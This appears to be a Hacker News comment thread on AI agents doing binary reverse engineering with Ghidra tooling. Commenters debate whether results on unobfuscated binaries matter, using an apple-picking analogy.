      I tried a few approaches: https://github.com/jtang613/GhidrAssistMCP (the hardest to set up), Ghidra's analyzeHeadless (GPT-5.2-Codex worked well with it!), and PyGhidra (my go-to). Did you compare them to see which works best?

      I mean, very likely (especially with an explicit README for AI, https://github.com/akiselev/ghidra-cli/blob/master/.claude/s...) your approach is the more convenient one to use with AI agents.

  • By mbh159 2026-02-22 22:07 · 1 reply

    The methodology debate in this thread is the most important part.

    The commenter who says "add obfuscation and success drops to zero" is right, but that's also the wrong approach imo. The experiment isn't claiming AI can defeat a competent attacker. It's asking whether AI agents can replicate what a skilled reverse engineering (RE) specialist does on an unobfuscated binary. That's a legitimate, deployable use case (internal audit, code review, legacy binary analysis) even if it doesn't cover adversarial-grade malware.

    The more useful framing: what's the right threat model? If you're defending against script kiddies and automated tooling, AI-assisted RE might already be good enough. If you're defending against targeted attacks by people who know you're using AI detection, the bar is much higher and this test doesn't speak to it.

    What would actually settle the "ready for production" question: run the same test with the weakest obfuscation that matters in real deployments (import hiding, string encoding), not adversarial-grade obfuscation. That's the boundary condition.

    • By celeryd 2026-02-22 22:28 · 4 replies

      Why does that matter? Being oblivious to obfuscated binaries is like failing the captcha test.

      Let's say instead of reversing, the job was to pick apples. Let's say an AI can pick all the apples in an orchard in normal weather conditions, but add overcast skies and success drops to zero. Is this, in your opinion, still a skilled apple picking specialist?

      • By sonofhans 2026-02-22 23:00

        What if it’s 10x as fast during clear conditions? Then it doesn’t matter.

        No hate. My only point is that it's easy for analogies to fail. I can't tell the point of either of your analogies, whereas the OP made several clear and cogent points.

      • By mbh159 2026-02-25 11:48

        I'm not a deep security expert, but I assume the skill of the agents will continue to get better, so I'm not saying AIs can do this task as reliably as humans. There's likely utility for non-adversarial triage and internal audits with human review. And with better AI apple pickers for sunny conditions, you need fewer human pickers for the night shift. Measuring the progress of said apple picking is what's interesting.

      • By xboxnolifes 2026-02-22 23:17

        Maybe not, but also maybe you would no longer need skilled apple picking specialists.

      • By AlexeyBelov 2026-02-24 5:52

        You're replying to an LLM

HackerNews